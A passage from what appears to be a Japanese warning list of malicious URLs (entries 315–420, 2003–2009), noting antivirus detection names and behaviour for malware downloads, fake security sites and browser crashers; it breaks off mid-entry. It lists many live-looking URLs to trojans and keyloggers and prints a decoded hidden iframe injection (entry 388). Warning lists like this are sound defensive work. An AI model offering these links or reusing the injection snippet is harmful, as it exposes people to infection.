  315. http://aloni.memebot.com/rb.exe
    [2008/10/23]ウィルス名:HKTL_HIDEWIND.AA


  316. http://aloni.memebot.com/sxs.exe
    [2008/10/23]ウィルス名:RAP_GENERIC


  317. http://aloni.memebot.com/udp.exe
    [2008/10/23]ウィルス名:TROJ_GENERIC


  318. http://aloni.memebot.com/vnc.exe
    [2008/11/08]バスター無反応だが、以下の多くのウィルス駆除ソフトで反応。
    AhnLab-V3 → Win-AppCare/Vnc.32768
    AntiVir → SPR/VNC.A
    Authentium → W32/HackTool.CDN
    Avast → Win32:Trojan-gen {Other}
    AVG → HackTool.DCT
    BitDefender → Spyware.Vnc.A
    DrWeb → Tool.VncBypauth
    eSafe → Win32.Adload.a
    Ewido → Not-A-Virus.NetTool.Win32.VNC.a
    F-Prot → W32/HackTool.CDN
    F-Secure → NetTool.Win32.VNC.a
    Fortinet → HackerTool/VNC
    GData → Spyware.Vnc.A
    Ikarus → not-a-virus:NetTool.Win32.VNC.a
    K7AntiVirus → Non-Virus:NetTool.Win32.VNC.a
    Kaspersky → not-a-virus:NetTool.Win32.VNC.a
    McAfee → potentially unwanted program HTool-BypassVNC
    Microsoft → HackTool:Win32/Vncpass.A
    NOD32 → Win32/NetTool.VNC.A
    Panda → Application/BypassVnc
    Prevx1 → Malicious Software
    SecureWeb-Gateway → Riskware.VNC.A
    Sophos → VNC Vulnerability Scanner
    Symantec → Backdoor.Prorat
    TheHacker → Aplicacion/VNC.a
    ViRobot → Not_a_virus:VNC.Scanner.32768
    2008/10/27 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、「弊社では正常ファイルとして判断したファイルであり、対応は行わない。」とのこと。


  319. http://aloni.memebot.com/wOw.exe
    [2008/10/23]ウィルス名:IRC_GENERIC+TROJ_GENERIC+HKTL_HIDEWIND.AA


  320. http://aloni.memebot.com/xDx.exe
    [2008/10/23]ウィルス名:HKTL_DFIND.B


  321. http://amaena.com/securityworm5/
    [2006/06/24]踏むと これ を表示。「OK」を押すとリモホを表示して「WinAntiVirusPRO」の購入を勧めてくる。
    「WinAntiVirusPRO」は偽装ウィルス駆除ソフトなので注意。


  322. http://amaena.com/securityworm5/jp/?aid=adtiger-jp&lid=jp
  323. http://amaena.com/securityworm5/jp/?aid=oemg&lid=os&j=1
    [2006/04/08]踏むと これ を表示し、「OK」を押すとリモホを表示し、スパイウェア駆除ソフトのようなものをDLを催促するサイトを表示する。このサイトは右クリックすると これ を表示する。


  324. http://amaena.com/securityworm5/jp/?aid=fast768_jp_ja&lid=ron&h=&b=0
    [2006/05/21]他の方の結果では
    「悪名高き偽アンチウィルス、WinアンチウィルスPROを買わせようとする仕掛け。無視して閉じるが吉。」


  325. http://amateur.elitecities.com/gekiuradvd/
    [2005/10/02]「激裏DVD」という名のサイトだが、ウィルス名:TROJ_ISTBAR.FS を検出。
    OBJECTタグで以下の2つのファイルをインストール+実行しようとしているのが原因。
    //cdn.climaxbucks.com/mt/dialers/fc/UniDistIO.CAB
    //cdn.climaxbucks.com/internet-optimizer/br/wsi13/optimize.exe


  326. http://amateur.elitecities.com/kokimaron/99bbcom_sakasitamai.htm
  327. http://amateur.elitecities.com/kokimaron/dms057.htm
    [2005/08/31]日本語のアダルトサイトだが、ウィルス名:TROJ_ISTBAR.FS を検出。
    アクセス解析「shinobi」を使ってアクセスログを取っている。


  328. http://amateur.elitecities.com/kokimaron/page/deaikeimonogatari06.htm
    [2005/09/04]ウィルス名:TROJ_ISTBAR.FS


  329. http://amateurx.h.fc2.com/reserved/videokids.htm
    [2006/10/26]「VIDEO KIDS」という名の海外アダルトサイトだが、「win32.exe」なるものが落ちてきてウィルス名:TROJ_TIBS.NT を検出。


  330. http://amazon4sex.com/
    [2006/01/20]海外アダルトサイトを表示するが、以下のウィルスを検出。「xpl.wmf」ファイルも落ちてくる。
    ウィルス名:EXPL_WMF.GEN+TROJ_NASCENE.Y+TROJ_ANICMOO.X+JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC
    ソースを見るとコード変換された部分がある。そこに以下のURLが隠れている。
    //game4all.biz/adv/120/new.php
    [2006/04/13]他の方の結果では「ウインドウが45秒おきに増える これがルーレットで、有害を含むので、有害。」


  331. http://amigo.in/hahahahahaha/oppai.html
    [2008/11/05]全画面フラッシュが始まる。タスクの強制終了で脱出可能だが、やや脱出困難であった。
    慌ててしまいがちだが、F4キーを押し、タスクバーを表示させて(全画面フラッシュにかき消されるが)、落ち着いて隙を突いてタスクの強制終了をさせれば それで終わりである。


  332. http://amilala.blogspot.com/
    [2004/12/04]JS_AMILALA.A作成者?のサイトで注意が必要。
    2004/07/01から復活していたが2004/12/04に確認しにいくと404の模様。 詳しくは こちら を参照。
    [2005/03/26]現在の//amilala.blogspot.comの詳細動作は こちら を参照。
    [2005/05/20]改めて確認。踏むと こんな感じの画面 。JavaScriptOFFにしてる状態では普通のBlogを表示。
    「Under maintenance: This site is undergoing maintenance at the present time.」

    「メンテナンス中」らしいので、今後も注意が必要。
    [2005/07/09]踏むと このアラート を表示。「OK」を選ぶと これ を表示。「キャンセル」を選ぶと これ を表示。
    これ の「OK」「キャンセル」のどちらを選んでも海外のトレンドマイクロ社のウィルス名:JS_AMILALA.Bの説明ページに飛ぶ。
    [2004/07/10]他の方の解説は こちら
    [2005/08/08]以下は このアラート の解読法を紹介。−−提供して頂いた情報−−
    −解読法−
    1=IまたはL
    0=O
    U=you
    R=are
    8=B
    B=be
    N=多分inだと思います。(これはわからない)
    W/=まったくわからないのでweにしておきます。
    だと、思います。解読文載せておきます。
    Yup dis Blog is also dumbfuck dat bnt no ma main webby.
    Meet dun give a shit now ittl be going on.
    ++For all of who are japan yahoo Bastars++
    Damn fag just get lost yall dickheads you are even jerk now.
    Should dap you asshie in get outer here.
    This bnt a porn site you love in how all yall muth a fuckers you smeily skunky cunt.
    Just fuck off okie shit.
    Mum will suck off you're micro cock drenched we come.
    Did will lick up you're giga clit soaked we sperm

    LaLa*Land
    Exploit dew manager vxLaLa_root, Chair of Yahoo Booters[AmiLaLaFlowers]
    という感じだと思います。
    独特の英文もあるので翻訳は難しいと思います。
    多分作者はオーストラリア人です。Hiyaはオーストラリアの方言でHiの意です。
    --------------------------------------------
    [2006/01/19]改めて確認。踏むと これ を表示。
    「OK」を選ぶと以下のURLに飛び、こんな感じ のページを表示する。普通に閉じれる。
    //amilala.blogspot.com/admin/HTTP404
    「キャンセル」を選ぶと これ を表示。 これ の「OK」「キャンセル」のどちらを選んでも以下のURLに飛び、googleの検索結果のページを表示する。「Amilala」という言葉を検索した結果である。
    //www.google.com/search?hl=en&q=Amilala
    [2006/03/29]−以下は2chでのレス−
    • 「踏んでみましたが404エラーの様です。IE以外で踏めばMicrosoftに飛ばされ、IEで踏めば404エラー。前はかなりヤバイブラクラでしたが今は無害。」
    • 「ノートンいれてるんで安心してたんですが、踏むと窓が開いて英語で〜ok?みたいなのが出たので、キャンセルしたら変なグーグルみたいなのが見えたんです。あわてて閉じて、ノートン無反応ではあったんですけどなんだか怖くなっちゃって。。大丈夫でしょうか?」
    • 「文字化けしたようなダイアログやコマンドプロンプトが出るだけ。まあ現在は無害なんだが、以前はアミララという人物が運営していた。凶悪スクリプトコマンドを実行させられるブログサイトだった。当時あまりにも大きい被害を出した故、当該スクリプトはJS_AMILALA.Aというウイルス名で呼ばれている。因みにダイアログやプロンプトをキャンセルするとgoogleに行く仕様となっている。いずれにしても今は無害のようだから気にするな。」


  333. http://amilala.blogspot.com/?downloads=get-exploited.exe
    [2006/08/07]他の方の結果は以下の「」内。
    「変なアラートが表示され、閉じるとユーザープロンプトが開きます。
    それを閉じると VX Talks - Log in という洋ログインページ?に行きました。全てキャンセルで閉じてます。
    そこまでウイルス反応なしでしたが、amilala.blogspot.com が危険URL指定なので踏まないほうがいいでしょう。」


  334. http://an.to/?000X
    [2004/03/29]//raus.de/crashme/に飛ぶ。


  335. http://anagami.hp.infoseek.co.jp/i/ero.html
    [2004/08/04]無限JavaScript。タスクマネージャから脱出。
    [2006/04/13]他の方の結果では「「脱糞されますた」と永遠に出てくる。」
    [2006/12/21]再確認。無限アラート。これ が閉じても閉じても表示する。


  336. http://anbao.net.cn/ilbj.exe
    [2006/08/29]2006/08/12 にトレンドマイクロ社にファイルを提出。
    今日、その結果の連絡があり、ウィルス名:TROJ_STARTPA.GP として検出するよう対応、とのこと。
    2006/08/12 にDLしたファイルからウィルス名:TROJ_STARTPA.GP を検出することを確認。
    また、今日改めて当該URLからファイルをDLしてみてもウィルス名:TROJ_STARTPA.GP を検出することを確認。


  337. http://ancloveddn.5166.info/skarad/ard561103
    [2008/10/09]以下のURLに飛び、ウィルス名:JS_DLOADER.XSV を検出。
    //www.k5dionne.com/ffxmmi/


  338. http://angelfire.lycos.com/amiga2/hokan/2ch/index1.html
  339. http://angelfire.lycos.com/az3/match/main.html
    [2003/11/08]リンク先はブラクラ。


  340. http://angelfire.lycos.com/hiphop2/rupantitle/r3/R3_temp.swfinputStr=2EF53A187E
    [2004/06/23]下のURLに飛び、ブラクラチェッカーは無反応だがmailtoストームを発動。
    //www.angelfire.com/hiphop2/rupantitle/r3/R3_temp.swfinputStr=2EF53A187E


  341. http://angelstgp.offhost.info/?ptangelsmagazine.offhost.info
    [2004/07/22]スパイウェアの可能性。読み込むとウィンドウが2つ出てくる。
    1つ目は「あなたのパソコンにspy wareが侵入しているかもしれないよ。OKを押せば、どうやって排除するのかわかるよ」というダイアログが出てくる。
    2つ目は、洋ロリのギャラリーにリンクされている。
    [2006/04/13]他の方の結果では「ドメイン屋さんページだが、広告鯖が、指摘の通りに言ってくる可能性は十分にある。」


  342. http://angkatan90.org/images/video-nude-anjelia.avi.exe
    [2008/10/23]2重拡張子。ウィルス名:TROJ_AGENT.AHEF


  343. http://ani.atz.jp/ip/ip2.cgi
    [2006/01/15]厨房ホイホイ系ブラクラ。踏むといくつか怪しい挙動がある。具体的には以下。
    1. TELNETが3つ立ち上がる。接続先は //ani.atz.jp だが、「ホストへの接続が失われました」となる。
    2. メディアプレーヤーが立ち上がるが、「サーバーが応答しないためファイルを再生できません」となる。
    3. リアルプレーヤーが立ち上がるが、「サーバーへの接続が確立できませんでした」となる。
    4. アウトルックが立ち上がり、ニュースグループを表示しようとするが、失敗に終わる。
      なお、フォルダ一覧に「ani.atz.jp:3737」が出来るが、アウトルックを一旦閉じて、再度開くと消えている。
    5. //ani.atz.jp/ip/ip2.cgiは「-IP CHECKER-」を表示して、リモホを表示する。
    [2006/03/12]他の方の結果では
    「telnetやリアルプレーヤーなどが起動してIPが抜かれてしまうブラクラでした。PC有害。ノートン先生は無反応です。」
    「telnetやreal-pやニュースページが立ち上がった後、自身のIPを画面表示されます。注意URLにつき回避を推奨します。」
    [2006/03/29]「wmpやらrealoneやらDOSプロンプトやら開きまくる怪しいサイト。」


  344. http://ani.atz.jp/ip/ip2.cgi?file=06040700427.zip
  345. http://ani.atz.jp/ip/ip2.cgi?file=viploader25885.zip.html
  346. http://ani.atz.jp/ip/ip2.cgi?file=viploader2d26382.zip
    [2006/04/13]TELNETストーム。


  347. http://ani.atz.jp/ip/ip2.cgi?Goods=004NEY0&ID=0054KI00
    [2006/04/06]他の方の結果では
    「普通のブラクラ。環境によるけど複数のアプリが勝手に起動(realplayerとかoutlook)。
    後はtelnetストーム、IPの表示、勝手にニュースグループを作成、など。PCに対する破壊活動と言えるものは無い。各アプリを終了させれば問題無し。面倒なら再起動。」
    「厨房ホイホイというブラクラ。」


  348. http://ani.atz.jp/ip/ip2.cgi?up0200604073319.jpg
    [2006/04/08]TELNETストーム。


  349. http://ania.seksolatki.pl/SexKonekt6.1.exe
  350. http://ania.seksolatki.pl/wejscie/anal.scr
  351. http://ania.seksolatki.pl/wejscie/hardcore.scr
  352. http://ania.seksolatki.pl/wejscie/oral.scr
  353. http://ania.seksolatki.pl/wejscie/sex.scr
    [2006/10/01]2006/09/24 にトレンドマイクロ社にファイルを提出。
    2006/09/29 にその結果の連絡があり、ウィルス名:DIAL_ERODIAL.AD として検出するよう対応、とのこと。
    2006/09/24 にDLしたファイルからウィルス名:DIAL_ERODIAL.AD を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_ERODIAL.AD を検出することを確認。


  354. http://anime.elitecities.com/caramelman/HabaneroRenkinjutusi/
    [2005/03/26]エロ漫画サムネイルページだが、ウィルス名:TROJ_HOLICA.Cを検出らしい。私が踏むとウィルス名:TROJ_ISTBAR.FSを検出。
    稀に こんなセキュリティ警告 も表示する。ノートン、マカフィーでは無反応。


  355. http://animess.fateback.com/sab/gallery/misc.html
    [2004/12/18]ウィルス名:VBS_REDLOF.A
    [2005/03/06]ウィルス名:VBS_REDLOF.A-1


  356. http://annakova.com/annakova.exe
    [2008/11/15]ウィルス名:TROJ_ADLOAD.NBH


  357. http://anterosilvafotografia.web.pt/aspnet_client/system_web/video.avi.exe
    [2008/10/23]2重拡張子。ウィルス名:TROJ_RENOS.ADX


  358. http://antersd38fc2.com/blog-entry/
    [2008/09/04]こんな感じ のサイトだが、ウィルス名:JS_DLOADER.XSV を検出。
    ソースを見ると、IFRAMEタグで //www.k5dionne.com/ffxmmi/ を呼び出している。


  359. http://anti.bne.jp/upload/updata/
    [2005/03/26]//unei.anti.bne.jp/bom/に飛ぶ。
    [2007/05/12]再確認。Location ヘッダで、以下のURLに飛び、「You should die for the global peace」というアラートを閉じても閉じても表示する。
    //unei.anti.bne.jp/bom/


  360. http://anti.bne.jp/upload/updata/up0802.exe
    [2005/03/03]ウィルス名:WORM_SKA.A


  361. http://antimalware-scanner.com/promo/1/freescan.php?nu=77025304
    [2009/02/01]インチキセキュリティサイトと思われる。


  362. http://antispywareexpert.com/ASE_Setup_Free.exe
    [2008/09/16]2008/09/07 にトレンドマイクロ社にファイルを提出。
    2008/09/15 に その結果の連絡があり、ウィルス名:ADW_FAKEAV として検出するよう対応、とのこと。
    実際に 2008/09/07 にDLしたファイルからウィルス名:ADW_FAKEAV を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:ADW_FAKEAV を検出することを確認。
    2008/09/07 から今日までのファイルの置き換えは無い、と推測される。


  363. http://antivir-scan-for-free.net/1/?id=21151
    [2008/11/05]こんな感じ のページ。インチキセキュリティサイトである。
    これ を表示し、「OK」を押すと これ を表示する。
    以下のファイルをDLしろ、と催促してくるが、このファイルからウィルス名:PAK_GENERIC.001 を検出。
    //godd-soft-downloadz.net/antivirus.v.1.0.21151.exe


  364. http://antivirus-scanner.com/download/AtnvrsInstall.exe
    [2008/07/14]ウィルス名:TSC_GENCLEAN
    [2008/08/24]再確認。ウィルス名:Cryp_Pai-5


  365. http://antivirus-u.wowhost.us/wincommexe-virus.html
    [2008/12/24]これこれ を表示し、以下のURLに飛ぶ。インチキスパイウェア駆除サイトである。
    //antiviruspcfullscan.com/360/1/en/_freescan.php?sid=880278


  366. http://antivirus2008exp.com/downloads/XP-Vista-Antivirus.installer.exe
    [2008/09/13]ウィルス名:TSC_GENCLEAN+WORM_AUTORUN.AMH


  367. http://antiviruspcfullscan.com/360/1/en/_freescan.php?sid=880278
    [2008/12/24]こんな感じ のサイト。インチキスパイウェア駆除サイトである。


  368. http://anycracks.com/
    [2006/11/23]こんな感じ のサイト。
    以下の @ と A のURLを新窓表示して、ウィルス名:TROJ_DLOADBR.GEN を検出。
    これ を表示して、「OK」を押すと再びウィルス名:TROJ_DLOADBR.GEN を検出、今度はこれ を表示する。
    再び「OK」を押すと再度ウィルス名:TROJ_DLOADBR.GEN を検出して今度は「243461.exe」なるものをDLしろ、と言ってくる。このexeは不定期的に新しいファイルに置き換えられている。
    ソースを見ると隠しスクリプトで上記の挙動を起こしている。隠しスクリプトで呼び出されるURLは以下の B、C、D である。このうち D が元凶である。
    @、//teenalbums.com/index.php ← 海外アダルトサイト。
    A、//www.x-park.net/ ← ページが無くなっている模様。
    B、//anycracks.com/anycracks.js
    C、//69.31.84.220/pay/enter.php?id=2 ← 文字だけのページ。
    D、//yournetaccess.com/b/?id=st00274&r=


  369. http://apollogp.co.yu/_vti_txt/video-nude-anjelia.avi.exe
    [2008/10/23]2重拡張子。ウィルス名:TROJ_SMALL.GWL


  370. http://app.ezula.com/EARNNeoNapsterWO/install/eZinstall.exe
    [2006/07/20]2006/07/14 にトレンドマイクロ社にファイルを提出。
    本日、結果があり、スパイウェアパターンファイル「0.392.26」よりウィルス名:ADW_EZULA.Z として対応とのこと。
    当ファイルをDLしてウィルスを検出することを確認。


  371. http://app.ezula.com/ezula/install/ezPatch.exe
    [2006/07/20]2006/07/14 にトレンドマイクロ社にファイルを提出。
    本日、結果があり、スパイウェアパターンファイル「0.392.26」よりウィルス名:ADW_EZULA.AA として対応とのこと。
    当ファイルをDLしてウィルスを検出することを確認。


  372. http://app.ezula.com/SniffemWO/install/woinstall.exe
    [2006/07/20]2006/07/14 にトレンドマイクロ社にファイルを提出。
    本日、結果があり、スパイウェアパターンファイル「0.392.26」よりウィルス名:ADW_EZULA.AB として対応とのこと。
    当ファイルをDLしてウィルスを検出することを確認。


  373. http://app.ezula.com/WebDevAZ4/install/eZinstall.exe
    [2005/03/23]ウィルス名:ADW_EZULA.A


  374. http://app.ezula.com/WebDevWOInt/install/eZinstall.exe
    [2006/07/13]ウィルス名:ADW_EZULA.B


  375. http://app.ezula.com/WebDevWOInt/install/woinstall.exe
    [2006/07/13]ウィルス名:ADW_WEBOFFER.A


  376. http://apps.deskwizz.com/ax/adwerkz.cab
    [2006/09/01]2006/08/13 にトレンドマイクロ社にDL+解凍して現れた「adwerkz.dll」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:ADW_DESKWIZZ.A として検出するよう対応、とのこと。
    2006/08/13 にDLしたファイルからウィルス名:ADW_DESKWIZZ.A を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:ADW_DESKWIZZ.A を検出することを確認。


  377. http://apps.deskwizz.com/ax/wallpap.exe
    [2006/08/13]ウィルス名:TROJ_SMALL.AXZ


  378. http://appstraka.globalpatrol.net/appstraka316.exe
    [2005/12/13]ウィルス名:SPYW_TRACKAPPS.A 。スパイウェアの一種:キーロガーに属するものなので注意。


  379. http://appstraka.hypermart.net/download.html
    [2005/12/13]スパイウェア配布サイトのページ。踏むと こんな感じ 。このページ表示まで無害で、普通に閉じれる。
    画面中央の「AppsTraka v3.16 (USA)」というリンクをクリックすると、以下のexeがDLできるが、ウィルス名:SPYW_TRACKAPPS.Aを検出する。
    //appstraka.globalpatrol.net/appstraka316.exe


  380. http://aradbizi.vicp.cc/arad/bizhi033258/
    [2008/09/20]確認してみると、以下のURLに飛ぶので、そちらのURL List解説を参照。
    //maplestorfy.w16.okwit.com/kurubusi/sityounew.html
    [2008/09/20]他の方の結果は以下の「」内。
    「踏んでみると Kaspersky がウイルス「Trojan-Downloader.HTML.IFrame.ff 」を検出。」
    [2008/09/21]「メイプルストーリーの音楽が再生されますが、同時にウイルス名:VBS:Malware-gen、HTML:CVE-2007-0024-B、ANI:CVE-2007-0038 を検出しました。」


  381. http://arandrisgarcia.com/myfoto.exe
    [2008/10/23]ウィルス名:CRYP_XED-3+TROJ_SRIZBI.AO


  382. http://aretheymales.com/
    [2007/03/24]海外アダルトサイト。バスター無反応だが、他社製アンチウィルスソフトでは反応があると思われる。


  383. http://arqenelk.freehostia.com/library/linkinpark-midi/
    [2008/09/17]確認してみると、まず、こんな感じ のページを数秒間表示する。
    その後、以下の @ に一瞬飛んで、すぐに以下の A に飛び、こんな感じ のページを表示する。
    A では、まず これ を表示。「OK」を押すと次に これ を表示。
    これ では、「OK」を選ぶと以下の B のファイルをDLしろ、と催促してくる。
    「キャンセル」を選ぶと何も無いが、少し経つと これ を表示する。
    これ では、「OK」を選ぶと以下の B のファイルをDLしろ、と催促してくる。
    「キャンセル」を選ぶと再び これ を表示、再び「キャンセル」を選ぶと再び これ を表示する。
    結局、これ は「OK」を選ぶしかないようになっている。
    また、このサイトは普通に閉じれる。
    −−−−−−−−−−−−−−−−−−−−
    @、//scan-ia.com/?uid=152
    A、//scan-ia.com/19/?uid=152&in=1&xx=1&end=1&g=1&h=0&ag=1
    B、//scan-ia.com/download/IAInstall.exe
    [2008/09/17]他の方の結果は以下の「」内。
    大窓&無限強制アラートでexeをダウンロードさせる偽装セキュリティ窓が開きます。
    「Trojan-Downloader.Win32.FraudLoad.vcci」を Kaspersky で検出。


  384. http://arqnav.com.br/video_4.exe
    [2008/08/29]ウィルス名:TSC_GENCLEAN+TROJ_EXCHANGE.AF


  385. http://art.creativity.edu.tw/images/avatar/users/CalcImpSAT.exe
  386. http://art.creativity.edu.tw/images/avatar/users/CalcRFC.exe
  387. http://art.creativity.edu.tw/images/avatar/users/CalsRT58.exe
    [2008/08/26]ウィルス名:TSC_GENCLEAN+TROJ_VB.HUQ


  388. http://art-various.com/?ft=vaginator.com
    [2005/07/30]踏むたびに表示されるものが違う。調べるとどうやら4種類の表示があるようで、それぞれ症状も若干違う。探せば他の表示もあるかも知れない。
    その4つのソースは こちら → ソース1ソース2ソース3ソース4
    4つともウィルス名:JAVA_BYTEVER.Aが検出されるが、JAVA_BYTEVER.Aを検出する前にウィルス名:TROJ_SMALL.ANNを検出する場合もある。
    また、少ししてウィルス名:JS_MHTREDIR.AGを検出する場合もある。
    4つとも別窓が存在する。その別窓を閉じると違う別窓を表示する、の繰り返し。立て続けに閉じれば脱出可。
    4つのソースのうち、1つのソースの中に以下の暗号化された部分がある。
    60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,
    47,47,97,109,98,117,115,104,45,115,99,114,105,112,116,46,99,111,109,
    47,108,100,47,105,102,114,97,109,101,46,112,104,112,63,97,99,99,
    61,97,98,114,97,105,34,32,115,116,121,108,101,61,34,100,105,115,112,
    108,97,121,58,110,111,110,101,34,62,60,47,105,102,114,97,109,101,62

    これを復号化すると以下のスクリプトが現れる。

    <iframe src="http://ambush-script.com/ld/iframe.php?aca=abrai" style="display:none"></iframe>

    //ambush-script.com/ld/iframe.php?aca=abraiに行ってみるが、ページ自体は存在するものの、真っ白なページ。


  389. http://artella.biz/client/dist/HS_inst_current.exe
    [2008/11/17]ウィルス名:TROJ_AGENT.HYN


  390. http://artella.biz/dist/SSInstaller.exe
    [2008/11/15]ウィルス名:ADWARE_SAFESURF


  391. http://arvan.hp.infoseek.co.jp/korp/
    [2005/01/18]ニュースストーム。telnetストーム。
    [2005/03/18]アウトルックが立ち上がり、yahooの何か購読を登録される。
    その後、メディアプレーヤー、クイックタイムが立ち上がり、タスクマネージャで強制脱出。


  392. http://arvan.hp.infoseek.co.jp/online/
    [2005/01/16]「吉野家」のテンプレートというページだがconconクラッシャーの可能性。
    ただし、WinXPは無害、Win9xは最新バッチなら回避可。
    [2005/04/01]改めて確認すると、ウィルス名:JS_SPAWN.A。ブラクラ:「You are an idiot ! 」
    [2005/05/27]改めて確認。ウィルス+ブラクラ複合型になっている。
    ウィルス名:JS_SPAWN.A+VBS_REDLOF.A.GEN。ブラクラ:「You are an idiot ! 」
    ウィルスはIE最新パッチなら無害。Alt+F4押しっぱなしで脱出。


  393. http://as.adwave.com/WToolsD.cab
    [2006/07/24]他の方の結果は以下の「」内。
    「中にはWToolsD.cfgという設定ファイルが入ってました。
    ググってみるとスパイウェアが作り出すファイルと書いてるところもあります。
    とりあえずウイルス反応はなしです。」
    「調べて見ました。ブラウザがCool Web Search系のスパイウェアに乗ったられた時に、
    そのスパイウェアがダウンロードするファイルの一つだそうです。
    そのファイル単体では動作しないでしょうがわざわざダウンロードする価値はないかと。」


  394. http://asahi.bravehost.com/main.html
    [2005/10/08]TELNETストーム。


  395. http://asd.dasd89712l.com/mas1.exe
    [2008/10/06]ウィルス名:TROJ_ZLOB.AKT


  396. http://asd.dasd89712l.com/uusee.cab
    [2008/10/06]DL+解凍すると「UUSeeMediaCenter.exe」なるファイルが現れるが、ウィルス名:TSPY_ONLINEG.MIW を検出。


  397. http://asdfg.jodi.org/cgi-bin/../-------------------------------/-------------------------------/-------------------------------/-------------------------------/-----------------------401qe663/vb823.html
  398. http://asdfg.jodi.org/cgi-bin/zxcvb.cgi
    [2004/07/14]ブラウザが動きまわるページ?。脱出はAlt+F4で可能。上記URLと下記URLを互いに飛ぶ。


  399. http://asian.freexxxmovie.us/
    [2006/11/04]海外アダルトサイト。1回目の確認の時のみウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
    閉じると これ を表示し、下のexeファイルをDLしようとする。
    //cdn.drivecleaner.com/installdrivecleanerstart_jp.exe
    上記のexeファイルは 2006/11/01 にトレンドマイクロ社に調査依頼中である。
    2回目以降の確認では これ は表示されずに違うアダルトサイトを表示した。
    [2006/11/04]他の方の結果は以下の「」内。
    「McAfee SiteAdvisor − エクスプロイト警告 の反応あり。
    無効化して踏むと洋エロリンク系サイトが開き、
    Trojan-Downloader.JS.Inor.a
    Exploit.Java.ByteVerify
    Trojan-Downloader.Java.OpenConnection.aa を Kaspersky で検出。」


  400. http://asian.freexxxmovie.us/?galleryplanet.com
    [2006/09/09]海外アダルトサイトだが、ウィルス名:JAVA_BYTEVER.A+JAVA_BYTEVER.AB+JAVA_BYTEVER.AC を検出。
    Kaspersky では Trojan-Downloader.HTML.Agent.au を検出するらしい。


  401. http://asp-10.cn/a1/GLWORLD.html
    [2008/09/08]真っ白なページだが、ウィルス名:TSC_GENCLEAN+JS_EXPLOIT.CT を検出。


  402. http://asp-10.cn/a1/ms06014.htm
    [2008/09/08]真っ白なページだが、ウィルス名:TSC_GENCLEAN+VBS_PSYME.BKY を検出。


  403. http://asp-10.cn/a1/Real.html
    [2008/09/08]真っ白なページだが、ウィルス名:TSC_GENCLEAN+JS_EXPLOIT.CV を検出。


  404. http://asp-10.cn/a1/real.htm
    [2008/09/08]真っ白なページだが、ウィルス名:TSC_GENCLEAN+JS_REAPLAY.B を検出。


  405. http://asp-12.cn/a5/ss.html
    [2008/10/12]真っ白なページ。バスター無反応だが、他社製ウィルス駆除ソフトでは反応があると思われる。


  406. http://asp2win789.digiweb.com.br/1.html
    [2008/10/23]真っ白なページだが、ウィルス名:JS_PSYME.CJA+HTML_ADODB.HB を検出。
    このサイトは、'Microsoft Corporation'からの'Remote Data Services Data Control'アドオンを実行しようとしている。


  407. http://asp2win789.digiweb.com.br/adobe_flash.exe
    [2008/10/23]ウィルス名:TROJ_EXCHANGE.Y


  408. http://asp2win789.digiweb.com.br/cnn.html
    [2008/10/23]こんな感じ のサイトだが、ウィルス名:HTML_AGENT.AVYZ を検出。


  409. http://asp2win789.digiweb.com.br/get_flash_update.exe
    [2008/10/23]ウィルス名:TROJ_RENOS.AFT


  410. http://asp2win789.digiweb.com.br/index1.html
    [2008/11/27]こんな感じ のサイトだが、ウィルス名:JS_PSYME.CJA+HTML_ADODB.HB を検出。
    以下のファイルも落ちてくる。
    //asp2win789.digiweb.com.br/get_flash_update.exe


  411. http://aspasp.h162.1stxy.cn/t1aspasp.exe
    [2006/05/06]バスター無反応だが、以下のアンチウィルスソフトで反応。「リネージュ」に関するものと思われる。
    AntiVir → TR/PSW.Lineage.WO
    Avast → Win32:Trojano-3372
    Avira → TR/PSW.Lineage.WO
    BitDefender → Dropped:Generic.Malware.FM.20E62C2C
    DrWeb → Trojan.PWS.Lineage
    Ikarus → Backdoor.Win32.Rbot.AEU
    Kaspersky → Trojan-PSW.Win32.Lineage.aae
    McAfee → PWS-Lineage
    NOD32v2 → a variant of Win32/PSW.Lineage.DN


  412. http://astalavista.box.sk/
    [2006/05/21]こんな感じ のサイト。バスター無反応だが、Kaspersky で Exploit.HTML.UrlSpoof.a を検出するらしい。


  413. http://atewikijp.com/blog/
  414. http://atewikijp.com/blog/index.htm
    [2009/05/04]リロードを繰り返す真っ白なサイトで、ウィルス名:HTML_DLOADR.AET を検出。


  415. http://atomiclog.com/atomiclog23.exe
    [2005/11/12]ウィルス名:SPYW_ATOMIC.B 。スパイウェアの種類の中でも厄介なキーロガーの部類に属する。
    このexeは常駐型で「閲覧したWebページのURL」「実行されているアプリケーション」を記録し、外部に送信する。


  416. http://auto.isearch.com/isearch.cab
    [2005/04/10]ウィルス名:ADW_ISEARCH.B


  417. http://autoaimerforyahoopool.blog.com/
    [2008/11/22]偽装ウィルス駆除ソフトのページに飛ぶ。


  418. http://av.st44.arena.ne.jp/XPink.CAB
    [2006/10/27]2006/10/15 にトレンドマイクロ社にDL+解凍して現れた「XPink.exe」ファイルを提出。
    今日、その結果の連絡があり、ウィルス名:DIAL_CUTYGIRLS.K として検出するよう対応、とのこと。
    実際に 2006/10/15 にDLしたファイルからウィルス名:DIAL_CUTYGIRLS.K を検出することを確認。
    また、今日改めて当該URLからDLしてみてもウィルス名:DIAL_CUTYGIRLS.K を検出することを確認。


  419. http://availablegame.info/get.php?wmid=bgates
    [2006/10/21]2006/10/14 に落ちてきた「q387.exe」ファイルをトレンドマイクロ社に提出。
    2006/10/19 にその結果の連絡があり、ウィルス名:DIAL_DIALER.KM として検出するよう対応、とのこと。
    実際に 2006/10/14 にDLしたファイルからウィルス名:DIAL_DIALER.KM を検出することを確認。
    しかし、今日改めて当該URLからDLしてみるとバスター無反応。
    新しいファイルに置き換えられているものと推測される。


  420. http://avexnet.bravehost.com/050928noma.html
    [2005/10/01]TELNETストーム。アンチドートでウィルス名:Trojan.JS.NoCloseを検出。
    ノートンでもトロイの木馬:Trojan Horseを検出するらしい。
    TELNETストームは私の環境( IE 、FireFox 双方 )でも確認。CTRL+ALT+DELの親元のタスクの終了で脱出。
    [2005/10/02]他の方の結果は以下。
